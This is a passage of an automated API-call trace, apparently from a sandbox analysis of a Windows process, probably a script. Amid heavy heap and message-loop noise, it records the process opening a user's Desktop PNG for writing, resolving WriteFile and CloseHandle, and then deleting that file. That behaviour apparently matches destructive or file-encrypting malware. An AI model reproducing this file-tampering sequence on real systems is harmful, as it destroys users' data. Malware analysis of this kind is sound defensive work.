lpMsg=0x87ee3c) returned 0 [0167.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.116] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0167.116] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0167.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0167.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s1epd3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0167.117] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.118] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0167.118] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.118] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0167.118] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0167.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0167.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bdab0 [0167.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bdab0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0167.120] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.120] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0167.120] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.121] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.121] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.121] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0167.121] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0167.121] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.121] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0167.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0167.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0167.122] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.122] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0167.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0167.122] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0167.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png", lpFilePart=0x0) returned 0x30 [0167.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e19210, ftCreationTime.dwHighDateTime=0x1d5df9a, ftLastAccessTime.dwLowDateTime=0x2f441200, ftLastAccessTime.dwHighDateTime=0x1d5dd75, ftLastWriteTime.dwLowDateTime=0x90659e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x11488, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="s1epd3.png", cAlternateFileName="")) returned 0x90ae18 [0167.125] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s1epd3.png")) returned 1 [0167.128] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e19210, ftCreationTime.dwHighDateTime=0x1d5df9a, ftLastAccessTime.dwLowDateTime=0x2f441200, ftLastAccessTime.dwHighDateTime=0x1d5dd75, ftLastWriteTime.dwLowDateTime=0x90659e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x11488, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="s1epd3.png", cAlternateFileName="")) returned 0 [0167.128] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0167.128] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.129] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.129] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0167.129] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0167.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.130] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.131] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.132] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: 